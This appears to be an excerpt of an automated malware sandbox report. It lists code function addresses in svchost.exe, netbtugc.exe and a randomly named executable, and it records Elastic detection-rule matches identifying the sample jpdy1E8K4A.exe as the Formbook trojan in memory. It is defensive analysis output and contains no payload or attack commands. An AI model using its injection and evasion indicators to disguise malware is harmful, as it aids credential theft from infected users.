Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30100 2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC8158 2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD2000 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3C7C0 2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40770 2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A64750 2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5C6E0 2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B00591 2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40535 2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEE4F6 2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE4420 2_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF2446 2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF6BD7 2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFAB40 2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3EA80 2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0A9A6 2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A56962 2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A268B8 2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6E8F0 2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4A840 2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A42840 2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABEFA0 2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4CFE0 2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A32FC8 2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A82F28 2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A60F30 2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE2F30 2_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB4F40 2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52E90 2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFCE93 2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFEEDB 2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFEE26 2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40E59 2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A58DBF 2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3ADE0 2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4AD00 2_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADCD1F 2_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0CB5 2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30CF2 2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40C00 2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A8739A 2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF132D 2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2D34C 2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A452A0 2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE12ED 2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5B2C0 2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4B1B0 2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7516C 2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2F172 2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0B16B 2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF70E9 2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF0E0 2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEF0CC 2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A470C0 2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF7B0 2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF16CC 2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A85630 2_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADD5B0 2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B095C3 2_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7571 2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF43F 2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A31460 2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5FB80 2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB5BF0 2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7DBF9 2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFB76 2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADDAAC 2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A85AA0 2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE1AA3 2_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEDAC6 2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB3A6C 2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFA49 2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7A46 2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD5910 2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A49950 2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5B950 2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A438E0 2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAD800 2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFFB1 2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A41F92 2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A03FD2 2_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A03FD5 2_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFF09 2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A49EB0 2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5FDC0 2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7D73 2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A43D40 2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF1D5A 2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFCF2 2_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB9C32 2_2_03AB9C32
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E2D71 3_2_043E2D71
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EB41D 3_2_043EB41D
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EB464 3_2_043EB464
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EB45F 3_2_043EB45F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E4D44 3_2_043E4D44
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_044037B4 3_2_044037B4
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E4B24 3_2_043E4B24
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E4B1D 3_2_043E4B1D
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_07151F1F 3_2_07151F1F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_0714FF9F 3_2_0714FF9F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_0715863F 3_2_0715863F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_0715863A 3_2_0715863A
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_07156DCF 3_2_07156DCF
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_071585F8 3_2_071585F8
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_0715A44F 3_2_0715A44F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_07151CFF 3_2_07151CFF
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_07151CF8 3_2_07151CF8
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_0717098F 3_2_0717098F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038403E6 5_2_038403E6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0378E3F0 5_2_0378E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383A352 5_2_0383A352
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038002C0 5_2_038002C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03820274 5_2_03820274
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038341A2 5_2_038341A2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038401AA 5_2_038401AA
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038381CC 5_2_038381CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03770100 5_2_03770100
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0381A118 5_2_0381A118
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03808158 5_2_03808158
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03812000 5_2_03812000
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03780770 5_2_03780770
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037A4750 5_2_037A4750
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0377C7C0 5_2_0377C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0379C6E0 5_2_0379C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03840591 5_2_03840591
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03780535 5_2_03780535
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0382E4F6 5_2_0382E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03824420 5_2_03824420
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03832446 5_2_03832446
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03836BD7 5_2_03836BD7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383AB40 5_2_0383AB40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0377EA80 5_2_0377EA80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03796962 5_2_03796962
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0384A9A6 5_2_0384A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037829A0 5_2_037829A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0378A840 5_2_0378A840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03782840 5_2_03782840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037AE8F0 5_2_037AE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037668B8 5_2_037668B8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037F4F40 5_2_037F4F40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037A0F30 5_2_037A0F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037C2F28 5_2_037C2F28
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0378CFE0 5_2_0378CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03822F30 5_2_03822F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03772FC8 5_2_03772FC8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037FEFA0 5_2_037FEFA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383CE93 5_2_0383CE93
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03780E59 5_2_03780E59
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383EEDB 5_2_0383EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383EE26 5_2_0383EE26
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03792E90 5_2_03792E90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0378AD00 5_2_0378AD00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0377ADE0 5_2_0377ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0381CD1F 5_2_0381CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03798DBF 5_2_03798DBF
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03820CB5 5_2_03820CB5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03780C00 5_2_03780C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03770CF2 5_2_03770CF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0376D34C 5_2_0376D34C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383132D 5_2_0383132D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037C739A 5_2_037C739A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038212ED 5_2_038212ED
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0379B2C0 5_2_0379B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037852A0 5_2_037852A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0376F172 5_2_0376F172
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037B516C 5_2_037B516C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0378B1B0 5_2_0378B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0384B16B 5_2_0384B16B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0382F0CC 5_2_0382F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383F0E0 5_2_0383F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038370E9 5_2_038370E9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037870C0 5_2_037870C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383F7B0 5_2_0383F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037C5630 5_2_037C5630
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_038316CC 5_2_038316CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0381D5B0 5_2_0381D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03837571 5_2_03837571
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03771460 5_2_03771460
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383F43F 5_2_0383F43F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037BDBF9 5_2_037BDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037F5BF0 5_2_037F5BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383FB76 5_2_0383FB76
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0379FB80 5_2_0379FB80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037F3A6C 5_2_037F3A6C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03821AA3 5_2_03821AA3
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0381DAAC 5_2_0381DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0382DAC6 5_2_0382DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03837A46 5_2_03837A46
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383FA49 5_2_0383FA49
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037C5AA0 5_2_037C5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03789950 5_2_03789950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0379B950 5_2_0379B950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03815910 5_2_03815910
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037ED800 5_2_037ED800
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037838E0 5_2_037838E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383FFB1 5_2_0383FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383FF09 5_2_0383FF09
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03743FD5 5_2_03743FD5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03743FD2 5_2_03743FD2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03781F92 5_2_03781F92
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03789EB0 5_2_03789EB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03783D40 5_2_03783D40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0379FDC0 5_2_0379FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03831D5A 5_2_03831D5A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_03837D73 5_2_03837D73
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_037F9C32 5_2_037F9C32
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0383FCF2 5_2_0383FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D51A30 5_2_02D51A30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D4CB80 5_2_02D4CB80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D4C959 5_2_02D4C959
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D4C960 5_2_02D4C960
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D4AC00 5_2_02D4AC00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D5329B 5_2_02D5329B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D532A0 5_2_02D532A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D53259 5_2_02D53259
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D550B0 5_2_02D550B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D6B5F0 5_2_02D6B5F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358E338 5_2_0358E338
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358E7EC 5_2_0358E7EC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358E453 5_2_0358E453
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358CB03 5_2_0358CB03
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358CAAB 5_2_0358CAAB
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_0358D858 5_2_0358D858
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03A2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03A87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 037C7E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 037FF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0376B970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 037B5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 037EEA12 appears 86 times
Source: jpdy1E8K4A.exe, 00000000.00000003.2141380419.0000000004623000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
Source: jpdy1E8K4A.exe, 00000000.00000003.2140771082.00000000047CD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
Source: jpdy1E8K4A.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
